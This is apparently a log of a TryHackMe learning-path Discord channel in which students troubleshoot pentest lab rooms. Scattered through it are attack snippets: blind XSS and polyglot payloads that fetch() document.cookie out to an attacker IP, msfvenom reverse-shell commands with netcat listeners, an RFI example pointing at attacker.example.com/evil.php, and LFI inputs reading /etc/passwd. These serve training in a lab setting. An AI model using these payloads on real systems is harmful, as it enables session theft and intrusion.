#junior-pentester-path

Hmm I am stuck. I am trying to get the flag in the Cookie Tampering Task in Authentication Bypass. The problem is, when I use this command: curl -H "Cookie: logged=true; admin=true" http://10.10.216.170/cookie-test I am still not logging in. Can someone help?

In Linux fundamentals part 3 / task 4 / 3rd question, I'm trying to download a file with wget but I have this message: failed: connection refused. I made sure that wget is filled with the right URL and /.txt, but it is still the same.

Are you not missing . [Dot] before flag.txt

hi, no, I checked and wrote like that: wget http://10.10.82.234:8000/.flag.txt

No?

I mean you aren't typing dot

. Dot represent hidden files in the linux file system

I typed it: 8000/.flag.txt

Are you able to ping your target machine?

It's little bit weird

Did you set up the python server?

It didn't work with 10.10.82.234:8000

In some cases, target machine takes time to load

but it did with 10.10.82.234

I am working on the THM Attack box.

You still need to set up a python server.

It's target machine and I think he can't setup

Otherwise he would be able to directly get the flag

You ssh in to the machine, set up the python server, on the attackbox download with wget.

I see

Get it
You are right

Got it now?

I'm trying right now

Hi all. I'm doing the Windows Priv Escalation but the connected machine keeps losing connection to my OpenVPN session. Any ideas??

I'm trying with ssh as you advised but the permission is denied now. I haven't changed the password that I've used before

You don't need to change any password.

ssh tryhackme@10.10.82.234

password is tryhackme

I think I can't set up pythonserver on the target machine of the attack box

Can you show a screenshot?

!docs verify

Because...

Using your target IP.

It worked for me. I was just able to get the file

So you got it? 🙂

I'm just going to fing and open that file

It should download where you entered the wget command.

Thank you for your help, Scrubs. I could manage it thanks to you. 🙂

Glad you got it.

how to cat the flag.txt , i am in windows

plzz help

type flag.txt

used more

multi-posting your questions is rude to the people who try to help

sorry

Hi, I am in Authentification Bypass, task 3 Brute Force, the command works but it doesn't display the password

Check your valid usernames file, it's not supposed to hold any other data like size, status etc.

There are only names in nano valid_usernames.txt

Maybe the formatting of the file is wrong, I suggest to create a new file from scratch with touch newfile and then manually write the usernames in it, 1 username per line

Thank you, it worked

Why the second field is not showing ( search field ) ?

Hello

Hi everyone

Little stuck with in the room Internal.
I can modify the wordpress and get a shell but after i'm stuck.
LinEnum give some interesting informations but any way to switch to user XXX.

do you have any suggestion ?

yes get it

sorry

i posted my message in other

I'm doing the Nessus Room - I hit the problem that many seems run into where I installed Nessus on my Win 10 machine and it cant hit the target IP when I do it for some reason.

I am installing Nessus on my Kali Linux VM - how long should this take? My VM has 8MB RAM and 60 GB HD allocated. Should this be taking a long time to install?

8 MB 💀

Got that on the VM - it's just REALLY dragging on the install - still compiling plugins

hope you mean 8 GB not 8 MB

Yeah

Same

LOL 8GB

as 8MB is to little for a kali vm

Yes, you are correct- 8GB

by a factor of magnitude

Mine has 4.3 GB

also nessus itself takes up 30 GB of space

Hahahaha!

My Dual P2 400's might have been happy with 8MB RAM!

so that will tell you a lot

Which part of the install are you at?

nessus is installed - trying to get the OpenVPN installed now

Did you set up an account with Nessus?

yah that part is done

just trying to connect my kali linux to tryhackme via openvpn

😄

looks like it keeps restarting

expects TSL Web Server Authentication

TLS

Which country are you in?

Either something is blocking your VPN, ( could be your country ) or your Date/Time is wrong on your Kali box.

Could also be something blocking the port used, or your ISP is blocking the traffic.

US

date/time is fine

let me try another refresh from the VPN

er VPN config file

maybe because i didnt chose the VIP option

That won't be an issue

When in doubt.... have you tried to turn it off and on again? 😛

One thing I like about this is that it's a hell of a lot more practical than just dittering around with linux CLI --- WHY am I renaming stuff etc etc?

im a junir

hey guys im having issues with Windows Privilege Escalation task 5

ive set up the msfvenom payload and im serving a http server

but on windows target machine when im doing wget i cant seem to connect

wget : Unable to connect to the remote server

What's your full command

wget http://10.10.133.202:8000/rev-svc.exe -O rev-svc.exe

on powershell

And a screenshot of your http server?

oh wait nvm i forgot that the thing crashed before i took a break and rebooted it. New attacker ip works

sorry

holy sht, I just learned something new that I've been saying wrong for years. by doing the Windows Fundamentals. UAC, thought the A stood for Access and its Account . Sad ( 25 year Windows Engineer )

does the Jr Pentest Path - Network Services (Enumerating Telnet) nmap scan really take a long time

finally finished 🙂

Congratulations ! 🥇

I am working on cross-site scripting, task 8. I entered the <script> code in the inspector as I did for the previous tasks. But it is greyed and hence I can't see the string THM. <textarea> was ended, so test does appear outside of the area.

Congratz! I finally finished yesterday aswell 😃

I'm not quite sure where to move on now

is the next suggested step to dive right into "Offensive Pentesting" path?

Learning 😄 the red part mostly. I thought I saw a pathways diagram that illustrated the next steps after the "junior" courses, but I can't find it anymore, so I probably just imagined it 😄
Yeah i know about the rooms, actually there are several tabs of my browser with open rooms pages, maybe it's time I get back to those you're right 😂

I see, yeah there's so much stuff, i'll dive in some more of that 😄

thanks @steel nymph

Gave +1 Rep to @steel nymph

I finished linux fundementals rooms, linux strength training and I have experience in programming and networking

where should I go from here

if you want to stick to paths:
If you want shadows recommendations it is in this order
#pre-security-legacy-path 
#974406074444685322 
#junior-pentester-path 
#pentest-plus-path
#web-fundamentals-path 
#offensive-pentesting-path 
#791764435991658556

if you want to do other stuff check the modules

ty

of course the network rooms are different too

Royal salutations à tous

/spo Is the netsecchallenge room meant to take a long time to scan i've been using this command for the 2nd question to find the port over 10,000 ||nmap -sS -sV -p10000-65000 10.10.79.171|| and have been waiting for a while now

got it working after a significant time

For future reference when using nmap against thm machines you tend to be able to change the timing of the nmap scan using -T4 or -T5

Yeah tried that and did'nt wait long enough so I thought something was wrong, but good to know that now

I was in authentication bypass trying to do a lab then suddenly i got this error stat/usr/share/wordlists/Seclists/Usernames/Names/names.txt : no such directory exists

Maybe I don’t have worldists already installed in my attackbox?

Or perhaps they are in a different place

So what should i do got little confused now

That’s what i get as an error * stat /usr

Yes i am

I am using attackbox

Okay wait

You know what maybe there was some typo i tried to check the path first then tried it again and it worked

Alright, I must be missing something here. File Inclusion Task #4, Part 2... I have the correct input which outputs - "File Content Preview of ../../../../etc/passwd" along with a printout with various directories. I do not see an answer to "In Lab #2, what is the directory specified in the include function?" - Any info would be helpful. 🙂

Warning: include([redacted answer]/../../../etc/foo) - Danke.

Hi, so I finished introduction to cyber security and pre security recently. Do I have the necessary knowledge do delve into jr pen test?

Ok thx!

what is probe in nmap using simple terms?

"test" or "try out"

who knows Pass-the-Hack attack

Pass the hash?

yep

Lots of people. Ask your question directly. Is it related to a room on this tryhackme learning path?

yes in privesc

Ok. Please ask your question directly. If someone can help, they'll help.

Hello,

Wondering if you could give me a hand. Probably is something really silly what´s happening but it´s triggering me already 😄

I'm on Linux PrivEsc on the task 11 - Privilege Escalation NFS

I shared the file with the victim machine through the share and it seems to run but not giving me root shell.

From the attacker machine:

See? it had to be something silly 🙂 Starting the machine again and checking.. Thanks !

Gave +1 Rep to @steel nymph

Thanks !!

Gave +1 Rep to @steel nymph

Hi

Hi

any chance i could get someone to help me on the "walking an application"

Ask.

Gave +1 Rep to @rustic totem

thank you im not sure how much context you need so ill copy paste the exact description on this particular flag External files such as CSS, JavaScript and Images can be included using the HTML code. In this example, you'll notice that these files are all stored in the same directory. If you view this directory in your web browser, there is a configuration error. What should be displayed is either a blank page or a 403 Forbidden page with an error stating you don't have access to the directory. Instead, the directory listing feature has been enabled, which in fact, lists every file in the directory. Sometimes this isn't an issue, and all the files in the directory are safe to be viewed by the public, but in some instances, backup files, source code or other confidential information could be stored here. In this instance, we get a flag in the flag.txt file. i can see the directory i assume its talking about called assets by inspect element/ debugger sources but all i see is 3 js files

Gave +1 Rep to @rustic totem

Check that assets directory through your web browsers

im not sure how

http://machineip/assets

Replace machineip with your target ip

got it thank you

Gave +1 Rep to @rustic totem

since friday i have been getting this error msg when i try anything with firefox, what's the matter? I thought it was a temporary server issue but days later...am i the only seeing that or it's general issue?

did you press the big green start machine button?

yes of course, can we start the attackbox without first starting the machine? never tried but i don't think so. i repeat, yes i started the machine

what's the machine ip that you see then?

10.10.38.80

http://10.10.38.80/robots.txt

works for me

really?

yes

so the issue is on my side then...

if you're not connected to the openvpn, open the link in the attackbox

https://media.discordapp.net/attachments/680459914828972076/980855675120939078/clipboard.gif

for copy pasting into the attacbox

Hi, I have problem in Authentification Bypass, Task 5 Cookie Tampering, I can't log in as admin, eventhough I have put the correct code

has anyone had trouble getting netcat to work on the XSS Blind module

try using the attackbox as that part doesn't work with openvpn IIRC

ill give that a go

and just to be sure i point netcat to listen to the target machine IP right?

no? you listen on your attackbox/thm ip which you've used in the xss payload

okay cool got passed this one

thanks

idk why it doesnt work outside of the attackbox

Hi guys. Please how can I access an Ubuntu 20.04 machine without the username and password

Is this related to the content on the path?

It's not on THM. It's just my personal study

This channel is for the path on tryhackme.
There are also way too many variables to answer your question...

was suffering with RDP only this helped T_T thanks

Gave +1 Rep to @shadow echo

Morning all, I have almost finished this path but have a question about web app pen testing that I cannot get the answer to in any of the rooms. During the pen test of a website, the client provides the URL / domain name of the website which they want to be pen tested. However, the underlying webserver has an IP address that the URL / domain maps to, does this mean as pen testers we are allowed to pen test the underlying webserver IP address? I ask this because, other customers will of course be using the underlying webserver, meaning an exploit on the underlying webserver could impact all customers sharing the IP address of the underlying webserver. A lot of the rooms say to scan the IP address of the webserver with nmap, then attack open / vulnerable ports. This is fine if the webserver is hosted internally by the customer, but what if the webserver is owned by the likes of GoDaddy and is shared by thousands of customers? Surely we would not be allowed to pen test it? Thank you

I am getting this error in the Walking an Application module where I am not able to access https://lab_web_url.p.thmlabs.com/ which should take me to the ACME IT Support. Pls help

Hello, is there any way to get coupons from tryhackme by completing the Jr penetration tester path?

I see, so if I as the pen tester cannot get approval from the hosting company, I cannot test the underlying webserver? I can still test the URL / domain though yeah? I think Plesk is the hosting company, will they even respond to me if I ask them the question?

it is more of a general question to be honest, wont be randomly attacking websites 🙂

hello, in the SQL injection room, in task 8 "SQL bind", why when you are looking for the name of the table you find the word 'analytics_' when in fact the name of the table is 'users'?

ok, I thought that since this is a laboratory, there should only be one table

You can't attack the URL/domain, because that's not how it works. You'd be attacking applications or systems at those URLs or on that domain, which may be under that hosting company.

thats not how it works? abc.com and def.com share the same webserver which is 1.1.1.1. I am sure I can attack abc.com until my hearts content without impacting def.com. The minute I attack 1.1.1.1 I am breaking the rules as that impacts both abc.com and def.com. Or is that incorrect also?

but I am on here for help! cant you explain to me please? why am I incorrect? I genuinely dont understand...

it goes to 1.1.1.1 like def.com does but its a separate application and has nothing to do with def.com

Im not testing 1.1.1.1

so how is it ever possible to test abc.com and not def.com

do I need to hope def.com also want testing?

I get that

but def.com have nothing to do with it

they dont know who we are

no mention of any of this on TryHackMe

about scoping and having to speak to the web host

I get it for testing the underlying server

no I am not

I am learning!!

and asking questions

that are not clear to me

If you slow down abc, it's likely to hit def

thank you

Gave +1 Rep to @steel nymph

Hi again all, quite tricky to explain this 🙂 My mate owns a website and he is happy for me to "play about" and practice my pen testing skills. In the THM rooms, the search feature on a vulnerable website is often used for the teaching / learning of injection techniques, for example if a user is able to search a website for an item, the searched for item appears in the URL as www.websitename/search?search=1 meaning I can easily manipulate the ?search=1 key / value pair. However, out in the wild (on my mates website) I am not seeing this. For example, the website does have a search feature, but when I type something to search for, the URL changes to www.websitename/search but does not show the key / value pair in the URL. This means I cannot manipulate it. I have used Burp to intercept the http request but still cannot see the key / value pair. Hope this makes sense? Thank you.

And by "happy for you to play about" you mean he gave you verbal permission to poke around ?

Unless you have a legal contract, don't do it.

thanks everyone

having an issue with Authentication Bypass, Brute Force module, I type in the command and it does not give me an output, I've looked at the command over and over again and I'm not catching any errors....any ideas?

i will insert a screenshot of my command

!docs verify

so that you can send said screenshot

you are filtering out all the 200 ok http responses

have you tried using -fs or -fw

@sage current I will try this

although on the website it literally says to filter out status code 200

okay then weirdness

yeah the command works, it just does not give me any results

oh well found the answer on a youtube video just kind of frusturated I couldn't get the command to work for myself

what was the error???

what does your valid_usernames.txt file look like???

there is no error

and that file just has a username on each line

theres 4 total

shut everything down and now im trying again i will paste a screenshot of the results i get when entering the command exactly as shown on the site

even had my girlfriend come over and type out the command, same result

the url should have /FUZZ at the end

Hi! In the file inclusion module, under Task #8 (Challenge) for the last challenge (RCE in Lab #Playground) what remote server should be used in the URL?

But attacking machine is where we enter the URL. So we enter 127.0.0.1 itself in the URL?

Okay. Yes. Let me try this.

Thanks a lot for the help! 🙂

Wait. But I access my target application from the attack machine. That's the only machine I have.

So I get this - Please visit the link http://10.10.223.100/

So I access this URL from the target machine. I don;t have any other machine.

Thats exactly what I am saying. I access my target machine from my attacking machine. So basically for remote server IP I have to enter 127.0.0.1, right?

Okay. Wait. Let me give you an example.

So a typical RFI looks like this:

http://example.com/?file=http://attacker.example.com/evil.php

Here example.com will be my target server. And attacker.example.com will be my attacking machine, right?

Okay so since I am accessing this from my attacking machine, this will be - http://example.com/?file=http://127.0.0.1/evil.php

Am I right?

127.0.0.1 is the local machine.

Okay. Thanks. Let me do something different. Thanks for your help though.

Hey guys! I am actually going through the junior Pentester path. If anyone wants to collaborate for a bit over voice chat we can work it together. I could also join another program.

I'm working on task 12 of content discovery where it wants you to use the wordlist and one of the automation tools. When I try them it says no such file or directory exists for it. Any suggestions?

It wont let me send a screenshot

sorry wrong screenshot. Was trying different directories give me a sec

i have been using for other paths since the beginning and it always went well, you changed the rules recently?

No, it's been like that for months, if not years.

what's file path for task 4 in local file inclusion room

Mh?

The question in the room is telling you what file they want you to read?

actually I m confused how to solve this question

like is asking what's request URI for /etc/passwd

If you are making a request to 10.10.10.10/index.php?lang=EN.php they are asking for the /index.php?lang=EN.php part

ok let me try

Btw, EN.php is also just a file that's getting included with that request, if that helps

for lab#1 I m putting index.php?lang=/etc/passwd but it's showing an error

If you'd like help with an error, please show us the error

hi can i get some help on intro to shells room, cant seem to make rdp work

sure.... what rdp program are you trying to use???

found the solution alrdy. Anyway, thanks!

Gave +1 Rep to @sage current

no problem... keep enjoying your learning journey

Hi! Im trying to understand the main difference between Local File Inclusion and the Directory Traversal vulnerability and i was wondering if anyone can help me to solve my doubt.

I will start saying that im understand the purpouse of both mecanisms but im not fully understand what is the difference between them.

• First, Directory Traversal is a vulnerability that gives a user the ability to read unauthorized files or documents on the server by modifying a parameter in a GET request that includes a file, such as: http://web.com/page?image=1.png

• In the other hand, LFI does the same but the page of tryhackme insist in the fact that the user's input is used in a file inclusion instruction like "include", "require", etc (in PHP-based web server) letting us to see the contents of any file in the system if there isn't any validation about our input.

My question is why do both methods lead to different results to the point of being considered different vulnerabilities? And what can I do through LFI that I couldn't through Directory Traversal and why? Thanks and regards!

I understand, if my input doesn't pass through an include()-function i will not be able to execute a PHP file that i prior upload to the server. That is?

Thanks

the shell room is so hard to understand 😢

the practice and examples

i uploaded some webshell to the /uploads

one i copied from task 11 webshells and one that was on the machine inside /usr/share/webshells

I tried to url encode and put that command in the url after ?cmd=

the one under active machine information on top of tryhackme page tasks

I tried it with the attackbox ip also

it probably works i just dont understand anything im doing

:D

:OO thanks

Hi, I was solving the Challenge section in the File Inclusion part of the Introduction to Web Hacking chapter and I'm kind of stuck at the moment.

I'm trying to solve challenge 2 and I don't know what I'm supposed to do. The challenge's page displays a message: "This page is only for admins". Thus, im go to the Storage section (DevTools) and i change the value of the THM cookie from "Guest" to "admin" and the message from the page changes: "Welcome admin! This is a admin web page! Get the flag!" and "Include a file in the input form below" but there isn't an input form and i don't know how to retrieve the flag /etc/flag2.

I tried to add a GET parameter in the URL in many ways and i used the curl command to send a POST with a file parameter too but it doesn't work neither. Any ideas? Thanks!

Sorry

i modify the THM cookie

and I realize that the content of the page changes depending on the value of said cookie. The lab is then resolved by including the correct cookie value to retrieve the flag. Regards!

Thanks 🙂

Hi all. I'm working on the Junior Pen Test path, and am on Burp Suite: Repeater, Task 6 Practical Example. The task is to add FlagAuthorised: True via repeater, which I've added and sent, but a flag is not showing up in the returned page or source code. What might I be missing? Thanks is advance!

have u looked in burp response tab?

Figured it out... Needed a second blank line at the end.

Thank you for the reply.

Linux PrivEsc task 12 because it does not allow to connect via SSH?
it tells me "segmentation fault"

ok

So I am working with Burp Suite trying to craft a request that causes HTTP 500 error. I cant quite seem to get it to go correctly. I have tried using symbols , large numbers , random strings of text

anything i am missing?

this is on the /product line

Yeah the negative or equal to zero seems interesting but how would i got about crafting that request

im currently doing /products<insert whateverhere>

wait

i just figured it out

syntax problem

LOL

python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share

hi, this command doesnt seem to work on my kali, any help

I already did what you told me, now what?

Hope everyones day is well. I am struggling with the Brupsuite Intruder Bonus optional questions.

Use Intruder to automate the column enumeration of the Union SQLi in the Repeater Extra Mile exercise.

so far I have looked back at the SQLi injection room, and see how to enumerate columns, but not sure how i would even begin the process of automating it using intruder

I know I need to capture a request to "active machine ip*/about and send it to intruder. My position will be the end portion of the path in the http request

and my attack type will be sniper, but not sure where to go from there

Hi, can anyone help me with authentication bypass, cookies tampering?

Wish I could. Just started that module

Ok, thanks, let me know then, when you will remember

What do you need help with?

When I type : curl -H "Cookie: logged_in=true; admin=true" http://10.10.24.205/cookie-test then I am still logged in as a user and no flag appears

It worked for me?

Where are you doing it?

Attackbox or VM?

?

Attackbox

Attackbox

It should still work..

Can you verify and show screenshot?

!docs verify

thanks, I have verified but am able to attach "hngs only in bot messages

Thing

I am not sure where to paste the token

Super thanks

Am waiting for the machine to start to make the screenshot

Hello there folks, I am working my way through https://tryhackme.com/room/fileinc

I am on the challenge section. Question 2 asks for the contents of /etc/flag2. The hint suggests looking at the cookies, but on inspection in FF and Chrome I see that the site cookies are empty. I have tried using curl -c also but I'm not having much luck. I've done a search here and I see that people are having luck finding cookie data.

Can someone point me in the right direction to viewing the cookies for this one ?

I'm not sure I'm accessing /challenges/chall1.php

Thanks for taking the time to point that out @steel nymph it's much appreciated. I'm guessing there's a few loose marbles rolling about my skull today.

Gave +1 Rep to @steel nymph

Is there a tool equivalent to Postman/Insomnia that comes OOB with Kali?

if i have a listener on target machine, and connect to it on my machine is reverse shell, is bind shell using those same commands but opposite by listening on my own machine?

Thanks again, I was thinking maybe burp or something would do the task. I'll keep looking into it

okay but do i use the same2 listening and connect commands on both cases?

i have read it am on task 13practice and examples

am i supposed to put attackbox IP or my tun0 IP because one place it says one and another place says the other

no i just click the green start machine button and the blue start attackbox button

in the room

You gotta understand how a reverse shell works

i think i know it

I connected to the OpenVPN connect thing which gives me the tun0 address. is that supposed to be the same as the attackbox ??

and do you like to be bombarded with questions or should i try not to? 😄

No, it's not supposed to be the same

oh so he meant i could use any of them

i dont know i tried to play king of the hill the other day and couldnt open the site so i followed some instruction i found on the tryhackme page which led me to this😄

am not 😄

For the final question in the file inclusion Challenge. I have tried ||Uploading a file to github gists|| in order to ||include it as a remote file inclusion|| it seems however that when connected to the THM VPN I do not have access to the internet at large, a full tunnel perhaps.

Am I barking up the wrong tree or just barking mad ?

ahh, I am indeed doing that

Am I on the right track that the challenge expects me to ||upload a file to my own file server?||

I tried using python3 -m http.server --bind 127.0.0.1 8000 but I do not have access to that in this context. (I suspected that I would not have anyway to access a locally hosted file from the browser context in this challenge). Sorry for my lack of correct terminology

I thought as much. I guess I was under the impression otherwise I would have to open up ports on my router etc

Really appreciate the patience, I'll give it another blast.

In XSS "Task 8 Practical Example (Blind XSS)"
The payload for the blind xxs is ||</textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>||

How come the XSS polyglot doesn't work here ?

you doing it from the attackbox or from your own attack vm???

I'm doing it from the attackbox. The escaped text area and script seem to work fine this is my polyglot string ||jaVasCript:/-//*\/'/"/%0A%0a/(/* */oNcliCk=fetch('http://ip:9001?cookie=' + btoa(document.cookie) ) )//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3ciframe/<iframe/oNloAd=fetch('http://ip:9001?cookie=' + btoa(document.cookie) )//>\x3e||

I was testing it. I have the mental model that it is a sort of catch all XSS methodology 😅

I'm a JS dev in my day job and I've never seen anything like it. Maybe some sort of super funky bookmarklet.

I guess that means I don't know why it didn't work. And I have a very rough idea why it would work in other scenarios.

The previous tutorial suggested that the polyglot would have worked in all the other examples levels. Now I'm left scratching my head as to why it doesnt work in this blind xss example.

I'm looking at the source. I thought the polyglot was a way to ensure that js would be run in all circumstances. Escaping everything that needs escaped and ending in a fallback iframe onload ?

My assumption was that I had made an error in the polyglot code.

I can appreciate that. I thought that in the case of being inside a text area it would be the fine string :p

For example :

<textarea>

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

</textarea>

https://output.jsbin.com/mecexo

Got it working. It was encoding the spaces in my code (as it should I guess >,<)

problematic partial ||<sVg/oNloAd=fetch('http://ip:9001?cookie=' + btoa(document.cookie) )//>\x3e||

rendered as ||<svg onload="fetch('http://ip:9001?cookie='" +="" btoa(document.cookie)="" )=""></svg>||

working partial: ||<sVg/oNloAd=fetch('http://ip:9001?cookie='+btoa(document.cookie))//>||

rendered as ||<svg onload="fetch('http://ip:9001?cookie='+btoa(document.cookie))//">\x3e</svg>||

Linux PrivEsc:Privilege Escalation:NFS

$ cd /home/backup
$ ls
nfs nfs.c
$ ./nfs
./nfs: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./nfs)

`

$ ls -l total 28 -rwsrwsrwx 1 root root 20680 Aug 18 02:42 nfs -rwxrwxrwx 1 root root 116 Aug 18 02:42 nfs.c

Anybody have an idea on this error on the box for this exercise that won't let me run ./nfs?

You most likely compiled the nfs.c on a machine with a GLIBC version that's not compatible with the one on the target machine.
Compile it on the attackbox, iirc that one should work on the target machine then

Hey everyone,
I'm almost done with the JR penetration tester path and I was wondering how I should continue my journey from here. I thought about finishing the Offensive Security path after this one. I have also finished the complete beginner path and have some knowledge on penetration test process and networking . What do you think?

Thank you👍

i feel dumb for asking, but how do i copy/paste from MY browser to the VNC attack box. I can go from VNC to my browser, but not the other way around

there is a clipboard where u can paste your copy from browser to attack box (left hand side of attackbox)

I believe you're onto something here
$ ldd --version ldd (Ubuntu GLIBC 2.31-0ubuntu9.1) 2.31 Copyright (C) 2020 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Written by Roland McGrath and Ulrich Drepper. [9:52 PM]
VS
[9:53 PM] [🔍] × ldd --version ldd (GNU libc) 2.36 Copyright (C) 2022 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Written by Roland McGrath and Ulrich Drepper.

I will try it from the attackbox rather than my machine. Would there ever be a real life scenario where I would have to downgrade a compiler to overcome such events in a real pentest?

GLIBC is a library that is being used by the compiler.
I would say yes regarding a "real pentest", but might someone else can give you a more reliable answer to that one.

Types of Security Controls:

• Preventive - Detective, - Deterrent, - Recovery, - Compensation

is this correct?

My college teacher has taught me this but when I search it online, there's just three types ( of control functions) preventive, detective and corrective . So which one is correct?

Ask your college teacher.

Why do you have to sound so rough man, I'm just asking. My teacher might get angry because I'll be questioning his knowledge you know

It's their job to teach you.

For all I know, you could be doing a test right now and you're cheating, which is against the rules of this server

No sir, not at all if that would have been the case then I would have thought of time too, tests have time limits you know.

A test online can be done in 5-10 min(s) and this could be your last question. 🙂

I didn't buy a subscription to cheat. I bought this so I can be a good scorer

No seriously it isn't

You don't need a sub to be in the server.:)

But seriously, when it comes to learning, your first port of call should be your teacher.

Explain what you don't understand.

This is a theory part so maybe it's a little boring but crucial too. So in this article , it says that Security control functions are of three types but according to what my teacher taught me it is of five types ( - preventive, detective, deterrent, recovery, compensating) . so which one should I consider correct?

☝️ thank you in advance for being a helper.

Gave +1 Rep to @remote iris

Question on the file inclusion room: In the first couple of questions we exploit the include PHP function for path traversal and it is obvious from the lab that it is using this function (by the warning shown on the page).
But in a real case scenario, how would one find out that a webpage is using this function?

how do I catch the shell with multi handler, i have it ready here. but the guy in youtube double clicked the shell.exe then it caught it but when i do it, i get "this app cant run on your pc"

msfvenom -p windows/x64/meterpreter_reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>

idk 😄

😄

☝️ Makes sense, thanks lassi!

Gave +1 Rep to @steel nymph

Apparently i cant make 32bit payload

the problem wasnt the 32bit but i just had to doubleclick from here it works, but doubleclick from desktop does not work

so my shell1.exe worked now 😄

hello guys, ive got a problem in the Authentication Bypass room, on task 2, "Website error messages are great resources for collating this information to build our list of valid usernames. We have a form to create a new user account if we go to the Acme IT Support website (http://MACHINE_IP/customers/signup) signup page." That link it supposed to be the machine ip, but its not working for me.

try to refresh your page

ctrl + F5

ggot it! i had to go back to task 1 and start the machine 😄 thanks m8

Gave +1 Rep to @plush herald

Is there a bug in the Windows Privilege Escalation room with the unquoted service path technique for task 5 question 2? I'm running into this....

I've tried two methods. One being directly from the module:
||msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe||

And the other:
||msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.6.110.36 LPORT=7777 -e x86/shikata_ga_nai -f exe -o Disk.exe||

The outcome of the screenshot above is from the second.

nc -lvnp 7777

Yeah, I'm RDP'd into the machine as we speak.

I re-created the payload using exe-service, and now it just goes to this which is the same issue I was having last night.

it's not.

I can get other reverse shells on this box, just not this one using the unquoted service path technique.

I am rdp'd into the windows machine using xfreerdp in my kali vm.

This same error has occurred two separate days after machine restarts.

k.

well, changing port and removing encoding worked.

thanks

Gave +1 Rep to @steel nymph

hi

the xxs room task8 on blind xss practice

my payload got blocked

how to solve this?

What was your payload?

</textarea><script>fetch('http://10.10.80.197:9001?cookie=' + btoa(document.cookie) );</script>

IS 10.10.80.197 your attackbox, or Target ip?

attackbox

That should work.

Can you DM me your attackbox URL?

Infact, no, what is your target IP?

10.10.102.34

Ok, give me a few min(s) so I can do it in my VM.

sure!

thanx for help

Ok, it worked for me.

So are you doing nc first?

yep

i set netcat as"nc -lnvp 9001" first

Do you have nc set up just now?

then i clicked the id number

You don't need to click the id number, you just wait.

oh I mean this id number in the red box

@remote iriscan i have a look on the network panel of the payload?

It won't go there, it will go to your terminal that is listening.

Could it be a problem with my network?

shoot

it work now

😄

Glad it worked now, happy hacking!

i think it went wrong with my network

my local kali vm doesn't work

but online kali attackbox work

Yeah, that room is iffy with tun* that are 10. < 10 . xxx.xxx

the kali vm should connect the lan with the openvpn command

but it doesn't

why?

I'm not sure, I never really asked Tim about it, because my tun0 works with the room.

holy molly!

i'm idiot

i set a wrong config file

😭

@remote iristhanks

You're welcome.

Hey can someone please recommend me a great comprehensive course on networking on Udemy, I really need to learn it, it seems it is a must to have a good understanding on it as a Security person. So please help me.. Would really appreciate your help

Nobody happens to have any idea on this?

@remote iris Man, can you please help me here. Please ... , would really appreciate it

I don't know any courses on Udemy that are decent, nevermind good.

oh i see .

if u want to learn networking, I suggest to go to Palo Alto website and learn

it's free

https://www.paloaltonetworks.com/resources

The site's UI is a little confusing . Thanks though

Gave +1 Rep to @plush herald

Helpful hint.

If you want to hide your name, also delete that THM-xxxxxxx

In the bottom right hand corner, we can use that to view your cert.

ah hah

OPSEC :-P

Does this mean if I have RW on the Startup container then I will also have RW on any sub container inside Startup container?

Hey, can somebody help me with scanning related question, the question is that in a port scanning result, when a port is found to be open and unfiltered as well, does that mean that port is one of the most vulnerable port and easy to be attacked? I am assuming that unfiltered means no firewall restriction applied.

No, it doesn't mean that. All it means is that port is open and you can complete the TCP handshake.
Your assumption is... Mostly correct? It means the firewall didn't stop you

If it's filtered in nmap, it means nmap didn't get a response

yeah, because there was a firewall, right? or something else?

Could be a firewall. Could be the host is down. Could be some traffic got lost.

You can't say for certain anything except "it didn't get a response"

okay got it , thanks for clearing the doubt so well.

Gave +1 Rep to @idle bison

Hi. On Privilege Escalation, Windows Privilege Escalation, Task 7, To change "Druva_inSync_exploit.txt", we need an administrator privilege. That privilege is the end goal of the task. Since I can't save the changes, I can't get the admin privilege to get the flag. HELP PLEASE!

How would you tell nmap to scan all ports?

I tried to go through the manual page to find the answer for this one for like five to 7 times by now but now I can't find the answer, so can somebody please help me?

-p-

Thanks 👍

Gave +1 Rep to @turbid crow

I see that now, it's present in the long text explanation.

Yeah that's what I thought and now I'll do that.👍 It consumes too much of time too.

man nmap | grep ports can also work, although you might need to fiddle with grep's context settings

Thanks, I'll look into it too.

Gave +1 Rep to @alpine barn

I was doing the thingy where I opened up the machine for Hacking Web Application, Walking on the Web thingy and it told me to type a url, I tried but nothing happened.

Please be more accurate on the explanation of your issue, add a link to the room, what task you are talking about, etc.
With "I was doing the thingy" it's hard to help

Aye aye.

Tell me you're Scottish, without telling me you're Scottish. xD

Haha being Scottish would be cool but I just type interestingly…

Hello friends. Faced a problem in the room Linux PrivEsc
Task 9 (Cron jobs)
Looks like cron doesn't work (though systemctl says it's active)
i add line to backup.sh
echo `date` > /tmp/date
and file /tmp/date is not created. it doesn't matter how long you wait. 1 or 10 mins.

thanks for your help friend. file was correct, but for some reason it lacks x permissions after machine started

Gave +1 Rep to @steel nymph

I'm doing the task 2 from Metasploit Exploitation. I set username to penny. I set the path to the /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt I also set RHOST correctly and also set it to stop on success. It's been running for 30 minutes trying all the passwords. Is this normal?

(445 is the port)

can u show the options?

!docs verify

verify first to send ss

ok I should be verified

for now not yet

I just clicked the link

and hit accept

u have to follow its step

give it a good read

Ahh i see just a sec

ok done

crap I see it

duh

the SMBpass I set the file...rofl

got it

password found in like 5 seconds

sometimes you find answer yourself as soon as you ask question.....

that's the rule

where can i find the root password of my attackbox?

i tried to run remmina and it asked for the root password though i was the root user

https://tryhackme.com/my-machine

Try that.

That link will give you the credentials for your attackbox.

